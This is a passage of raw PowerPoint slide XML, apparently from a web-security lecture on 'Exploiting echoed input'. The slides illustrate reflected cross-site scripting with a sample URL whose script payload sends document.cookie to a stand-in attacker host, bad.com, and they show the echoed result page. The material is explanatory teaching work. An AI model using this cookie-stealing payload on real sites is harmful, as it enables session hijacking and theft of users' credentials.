              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> gives someone an opportunity to change or perform some action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>on the data presented to him/her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321BC5A-CCAE-6541-ADEB-2CD21F68626F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="533400"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="109441">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="31" dirty="0"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="114" dirty="0"/>
              <a:t>echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-74" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169987" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9622B32F-C8C1-2346-8A26-EB52C1FD8172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2252663" y="2438400"/>
            <a:ext cx="6662737" cy="1624013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="21391" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="381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525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="163"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2100">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2513"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+	document.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED0727A-3911-1D4A-8086-00307C9B615C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1938338"/>
            <a:ext cx="4551363" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-51" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="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F70AC24-3E53-AE4E-AB96-9300101AD35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="381000"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="109441">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="31" dirty="0"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="114" dirty="0"/>
              <a:t>echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-74" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171011" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E327FE5B-773A-2B4A-A7C2-52468F8873DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="2027238"/>
            <a:ext cx="5508625" cy="1944687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="21391" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="381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525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="163"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2100" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2513"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>“http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+	document.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171012" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F689AFE-98A7-A347-A866-97EDD72F3F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1411288" y="5037138"/>
            <a:ext cx="7235825" cy="1973262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 9354185"/>
              <a:gd name="T1" fmla="*/ 0 h 2476500"/>
              <a:gd name="T2" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T3" fmla="*/ 0 h 2476500"/>
              <a:gd name="T4" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T5" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T6" fmla="*/ 0 w 9354185"/>
              <a:gd name="T7" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T8" fmla="*/ 0 w 9354185"/>
              <a:gd name="T9" fmla="*/ 0 h 2476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4185" h="2476500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9353778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9353778" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24765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 name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE99D416-9495-3340-9BC2-3C50F5646228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5073650"/>
            <a:ext cx="1277938" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14EC901-7E9A-C847-8B65-A48113C2FCD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4205288" y="5073650"/>
            <a:ext cx="4202112" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="2775821" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Searc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A641D9F-F509-2B43-B232-C935ABAC13A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463675" y="5073650"/>
            <a:ext cx="2009775" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2906"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2899"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="102"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-74" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171016" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F4B39B-9BC3-0344-8BA6-A028FED54BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1463675" y="6196013"/>
            <a:ext cx="2557463"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tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="020002"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.	.	.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B8CAFF-492B-1C41-A0E9-242F57FBC042}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525838" y="1508125"/>
            <a:ext cx="4627562" cy="430213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-51" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07364DBC-B6AE-7448-92CD-EFF13A987A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300413" y="4522788"/>
            <a:ext cx="4852987" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>victim.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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4984F66-E612-7242-B0AB-D660DC469689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
